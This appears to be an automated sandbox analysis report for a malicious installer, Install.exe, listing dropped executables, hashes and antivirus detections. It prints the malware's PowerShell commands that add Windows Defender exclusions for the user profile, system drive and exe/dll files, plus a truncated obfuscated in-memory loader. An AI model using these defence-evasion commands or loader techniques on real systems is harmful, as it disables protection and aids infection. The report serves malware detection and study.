                          Category:dropped
                          Size (bytes):5028144
                          Entropy (8bit):6.125106867276156
                          Encrypted:false
                          SSDEEP:98304:aqbWYKVEOkkj9NM8zWTl2ALz6dggqBu0teFFJyMEllE+VeJqUH:idzW0QuRabllA7
                          MD5:D55DC38B4EE6BED2168E74194533C572
                          SHA1:431F6F9AEB280102E8764A5184CABE6CC98052CA
                          SHA-256:4B283EC8E073FB61BBB612A152EB332A5C92E7473CF6584A8B716FD87684A936
                          SHA-512:C731304F2EC41AC9A49CA1727ED948299A40702D78A2B0BC9506E50AEAB97B5ADCF09D8958E48F8A0FFC9E2FF78941ED68DCAED2BAB06FEA847EB29EFAE58150
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: Virustotal, Detection: 50%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<b..................B..@......;.........B...@..........................pL..............................................C.<....................pL.0I............................................C.@.............B.\............................text....?.......@.................. ..`.nQuHRq..o@..P...p@..D.............. ..`.rdata........B.......B.............@..@.data.........C.......C.............@....9SAT.........C.......C............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.5305777622288925
                          Encrypted:false
                          SSDEEP:96:BZioj4N2c+qDo1Zo8FZikj4N2c+qDo1Zoe3x1xvxjZiij4N2c+qDo1ZooSx/x/xa:eSc57ec5Tgc5c6G
                          MD5:65537AD9317CD9A794FF2C8A25E3A7F8
                          SHA1:99CFC1994EEDC8F868B1245E655587DB41F269DF
                          SHA-256:5F7D9A86D2E3083645825298C5A61B2EB54DA2F2DA13241ECA4602C03766123F
                          SHA-512:99194B41134E7D8C016A22F4556267CE9C512AF7E886F10A2E2F3E4CF6478CF5DEB239A07E8CEE2EA383FCDD222C62680EA9163BBE25C576296390688BC78441
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014217..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.526751101211023
                          Encrypted:false
                          SSDEEP:96:BZisj4N2ctqDo1ZoQFZiFj4N2ctqDo1Zol3x1xvxjZirj4N2ctqDo1ZoHSx/x/xO:eGckvBckGzckpRD
                          MD5:3B10DF410A30476A570541A74E966B4E
                          SHA1:8834897CC7C20AD5C4C4B59A91B5535FB94B454A
                          SHA-256:4D3D10EC15EB5EB0E10AF8753F72EACE24DC29BA1D9B1638A7B1DD29C2EF8BC9
                          SHA-512:6D119BC9B7440EEFD9E2112530BAE3D038B6C698CFD12AAAB9FFA10EEDA1575BCE5BA56C395A930851F0498559C1CB576E871F14CBA37C79B716AB6C30A84A8A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014103..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 7048..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014103..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5758
                          Entropy (8bit):5.5307589123834395
                          Encrypted:false
                          SSDEEP:96:BZiAj4N2AMvtqDo1ZojZiqj4N2AMvtqDo1ZoCgC4jZiqj4N2AMvtqDo1ZotBooSV:eqFk0IFkcIFk22y
                          MD5:7E8115E31EC613777C6FDFF8F88B6CF2
                          SHA1:253DBF54E6B578E26E71DC64D505DE9F62630062
                          SHA-256:4045DB0535FC2EF934E014E0C773D7E43CA50B077ED8536979F8CED459F1B608
                          SHA-512:5C6316219855F84FF2A3854F02035C1D55690AFA1286A93171565D10DBBDB1AC4F44E4A23CF4D7C455835CECBB7F8B749B98B31340C32B4CB26FFB23F87C82E7
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014129..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014129..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220327014354..Username: computer\user..Run
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5943
                          Entropy (8bit):5.8320176220731055
                          Encrypted:false
                          SSDEEP:96:BZiuN4NNv4GZig3yXM84p32aw0lFrc0lmrn0lmTeowqDo1Zoav4GZig3yXM84p3j:envVnIKjVQr0QBavVnIKjVQr0QPu3
                          MD5:4D218FEB27E8E5EDB4F59D0922AA32A2
                          SHA1:DF06E9EDE255262EF358472D0C2A9B2FA306664D
                          SHA-256:5E36C2D39F94189CCAD4AEE28C26042A699ACEE5BB8E3C23ACA4C9BF9F16D853
                          SHA-512:FC7599509D4679CEA32839E147EA6A718DF3B58450ACC69B6B43135DFDAF0034EC5810C87918A8FB74C51F6613D8A44AE944B9AB12611BA992A5B27561D99C7A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014145..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$j
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9432
                          Entropy (8bit):4.926811811017033
                          Encrypted:false
                          SSDEEP:192:Gxoe5IpObxoe5lib4LVsm5emdJgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOC:Xwib4L+kjh4iUxm44Qib4w
                          MD5:ADFF5BE0A9BB797ADEDC0B16C501A155
                          SHA1:ED842BE69739E3BF9082DE8FB0F7A596C22C0345
                          SHA-256:DADBB3611E60443C1F96672B3950A32B915D115EAA6FE8F6D8A57BED4067E3B0
                          SHA-512:9C6CA436FCE28572CD48D090C437881657F17B415A26F6C113A89755282D5D9BF46650B5C3C31FD890EC5C67CA0AB9A90A6F28B21B8315C25B506C6AC8EE600E
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1112
                          Entropy (8bit):5.248273118987016
                          Encrypted:false
                          SSDEEP:24:3lPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKyH+S:VPerB4nqRL/HvFe9t4Cv94nH+S
                          MD5:C89140BEA721DEBDA4F741B52939612A
                          SHA1:A353FE9D71C211A24EE7208F45CCC71170A65CD4
                          SHA-256:05E8082DAD4310F294CF069474C1DFA784427D69E87229D750FDA87C46B2D0B4
                          SHA-512:B134E10810FD68B0F50B143A08AFD88AA340CC54C561B09D559E23A77149AC31F26DFFC2FAAC5485247896CDB8535C0084EA2EDD815FB6E56F385F956D00DF27
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5350
                          Entropy (8bit):3.907212050468804
                          Encrypted:false
                          SSDEEP:96:mgTVA1VwC9Hw1+Y3fmb2lpL+llpK3vbM+C4aWbga+vlLF5uOgA/wvpHJN/gAwIgA:3TVoVwC9HW/3+bq6hQM+CWbgaSLTu5A+
                          MD5:D6D553675A7B8F75130BDD8C7E3B7A7D
                          SHA1:EC8FE28936E9C0010B55180AD5A34439D1919EE3
                          SHA-256:523EAA769500D372D8DA8A2D77004F7F696865A174BB809B359792067822BE39
                          SHA-512:4DB377FD79B7B2218D824B04DF301209890D543C97A254A96AB28202890A23A7D68055EDF02592837377579ECD21F1055EC224F93B3C5CDF2D1295FD1B99A09F
                          Malicious:false
                          Reputation:unknown
                          Preview:......m....O.m....[F.......<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.o.B.Y.Z.x.p.o.B.u.J.D.g.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.h.C.P.A.J.C.D.c.A.n.F.q.J.q.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.N.i.b.V.x.W.x.T.F.c.).$.q.K.H.X.R.L.j.x.c.Q.b.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5250
                          Entropy (8bit):3.8780212618682253
                          Encrypted:false
                          SSDEEP:96:hgTVwJV49Hw1+Y3Xb+pXpK9M+C4aWOtBmD9Z+vl9EF5oY5gAeNvpHYNiagABQnor:2TVwJV49HW/3XbGZ+M+CW6gDzSeToYu6
                          MD5:8743521E80CA300CB5D64D9129AC9B32
                          SHA1:02EC0C200E3CE2F12CA6EFAC516CFC0E72DA5AA2
                          SHA-256:B71335A7AF988047E29D0BDCE479EE8DD32351F03DE0A73D53D7D5C68E82A1F9
                          SHA-512:308CE10E6858A1BF1CDB67356CA719E5E9EB735B2D6DA85AB32F903F35C125BA7166FC5951C13EC05EA859BBD0234901CE3A99683AB2A7A3ECA6AA51FE128755
                          Malicious:false
                          Reputation:unknown
                          Preview:....2a.!..OB.if.t...F.P.....<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.J.c.V.E.S.t.Q.t.P.h.k.P.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.j.w.j.R.g.Z.F.z.a.e.Z.B.Q.B.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.j.X.r.d.W.y.l.J.n.o.).$.J.k.E.T.j.F.s.A.c.r.F.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.9968573054623615
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Install.exe
                          File size:4713759
                          MD5:280bfd5ea1f41586ea0ef60ee44bc8db
                          SHA1:57aa866f42bccbaceed938390001148323d033c1
                          SHA256:a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
                          SHA512:5c2bd96fd1bf0d3c3cfbca97666c9b20a6ae2ee651ad50739d30a24339b90c9f5261c9c5ea93004c4d048d892708a22802f615f5ac8a7464dc07a614366e0bd8
                          SSDEEP:98304:keFfhFS2DkSocOZKjg/sN0GkhVT8pxlxE7SSvsaTGN:keFfhxISoJZKs/DjV0xESmeN
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                          Icon Hash:62f1d8ece6f37980
                          Entrypoint:0x40352d
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A2E0h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080CCh]
                          mov esi, dword ptr [004080D0h]
                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FAAFC52011Ah
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FAAFC5200EAh
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [00434FB8h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx
                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x42a8 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .ndata | 0x36000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc | 0x46000 | 0x42a8 | 0x4400 | False | 0.294404871324 | data | 4.14140312698 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country
                          RT_ICON | 0x461f0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                          RT_ICON | 0x48798 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                          RT_ICON | 0x49840 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                          RT_DIALOG | 0x49ca8 | 0x100 | data | English | United States
                          RT_DIALOG | 0x49da8 | 0x11c | data | English | United States
                          RT_DIALOG | 0x49ec8 | 0x60 | data | English | United States
                          RT_GROUP_ICON | 0x49f28 | 0x30 | data | English | United States
                          RT_MANIFEST | 0x49f58 | 0x349 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                          DLL | Import
